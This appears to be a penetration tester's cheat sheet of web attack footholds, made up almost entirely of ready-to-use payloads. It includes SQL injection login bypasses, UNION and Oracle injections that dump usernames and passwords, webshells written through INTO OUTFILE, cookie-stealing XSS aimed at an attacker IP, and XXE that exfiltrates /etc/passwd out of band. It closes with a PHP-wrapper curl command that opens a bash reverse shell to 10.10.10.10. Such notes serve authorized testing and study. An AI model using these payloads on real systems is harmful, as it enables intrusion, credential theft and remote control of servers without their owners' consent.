# Web footholds

# Poison Null Byte

A null byte tells many string parsers that a string is complete, allowing us to bypass extension filters.

http://10.10.73.124/ftp/package.json.bak%2500.md

# SQL injection

Bypass examples

' or 1=1--       # Use this when username is not known
foo@bar.com'--   # Use this when username is known

' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
' or 1#
' or 1=1 --
' or 1=1 -- -

NOTE: it can also be helpful to see if any error messages show up by trying a single quote '

# Union Injection

A UNION injection is when UNION statement are added to the query allowing us to make a arbitrary queries and append the results to the intended query. We'll need to match the same number of columns, or it will error.

' UNION SELECT 1;-- -    # testing 1 columns     
' UNION SELECT 1,2;-- -  # testing 2 columns     

Examples of what the query look like on the server:

SELECT username from players where country = '[input]';                       # Typical query
SELECT username from players where country = '' UNION SELECT 1;-- -';         # Generic union injection testing 1 columns
SELECT username from players where country = '' UNION SELECT user();-- -';    # Select Database user

Upload webshell

' UNION SELECT "<?php SYSTEM($_REQUEST['cmd']); ?>" into OUTFILE '/var/www/html/webshell.php' -- -
' union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/webshell.php' -- -

Load file

union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

# Oracle Union Injection

Run through ORDER BY expressions to see how many columns are available:

' order by 1--
' order by 2--
' order by 3--
' order by 4--
Something went wrong with the search: java.sql.SQLSyntaxErrorException: ORA-01785: ORDER BY item must be the number of a SELECT-list expression 

by doing this we determine that there is 3 columns.

' union select 1,2,3 from users--
' union select null,null,null from users--

# lets see which column we can get
' union select '1111',null,null from users--
1111 with title null from 0

# Ok the first column works, lets Oracle version
' union select (select banner from v$version where rownum=1),null,null from users--
Oracle Database 18c Express Edition Release 18.0.0.0.0 - Production with title null from 0

# lets get tablenames
' union select table_name,null,null from all_tables--

# lets get column names
' union select column_name,null,null from all_tab_columns where table_name='users'--
PASSWORD with title null from 0
USER_ID with title null from 0
USER_NAME with title null from 0

# let's dump the tables by concatenating columns with '||'
' union select USER_NAME||PASSWORD,null,null from users--

# XXS

# Stored XSS / session highjack

Stored XSS is the most dangerous type of XSS where a malicious string originates from the website’s database. Occurs when a website allows user input that is not sanitisedto be inserted into the database.

Use XSS to send cookie information to a server you control.

<script>new Image().src="http://10.10.10.10/bogus.php?output="+document.cookie;</script>
alert(document.domain)
alert(window.origin) 

# Reflected XSS

Payload is part of the victims request to the website and the website includes the payload in response back to the user. Examples

<script>alert(“Hello World”)</script>
<script>alert(window.location.hostname)</script>

# DOM-Based XSS

The structure of a website can be changed using this.

<script>document.querySelector('#title').textContent = 'I am a hacker'</script>

# XXE

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. Synack has a great writeup about this: https://www.synack.com/blog/a-deep-dive-into-xxe-injection/

# In bound examples

Display arbitrary text

<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY example "cookbook">]>
 <userInfo>
 <firstName>Redteam</firstName>
 <lastName>&example;</lastName>
 </userInfo>

Reading a local file:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

# Out of bound example

Note the &exfil; this must be included in the xml body somewhere for the attack to work.

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://10.10.10.10/dtd.xml">
%sp;
%param1;
]>
		<bugreport>
		<title>testing</title>
		<cwe>Bar</cwe>
		<cvss>Baz</cvss>
		<reward>&exfil;</reward>
		</bugreport>

On the attacking machine, fire up a simple web server python3 -m http.server 80 and craft a dtd file for use in the attack.

cat > dtd.xml   
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.10.10/dtd.xml?%data;'>">

look for GET requests on the simple sever, and decode the base64 containing exfiltrated data.

# Wordpress plugins

zip up a robust php file as a plugin. plugins are typically stores in the wp-content/plugins/ directory. So to execute your reverse shell after uploading browse to something like the following:

www.example.com/wp-content/wp-revshell/revshell.php

# LFI local File Inclusion

# php wrappers

PHP provides several protocol wrappers which can be used use to exploit directory traversal and local file inclusion vulnerabilities.

http://10.10.10.10/admin.php?file=data:text/plain,<?php echo shell_exec("ls") ?> 

curl -s --data "<?system('ls -la');?>" "http://10.10.10.10/internal/advanced_comment_system/admin.php?ACS_path=php://input%00"
curl -s --data "<?system('bash -i >& /dev/tcp/10.10.10.10/443 0>&1');?>" "http://10.10.10.10/internal/advanced_comment_system/admin.php?ACS_path=php://input%00"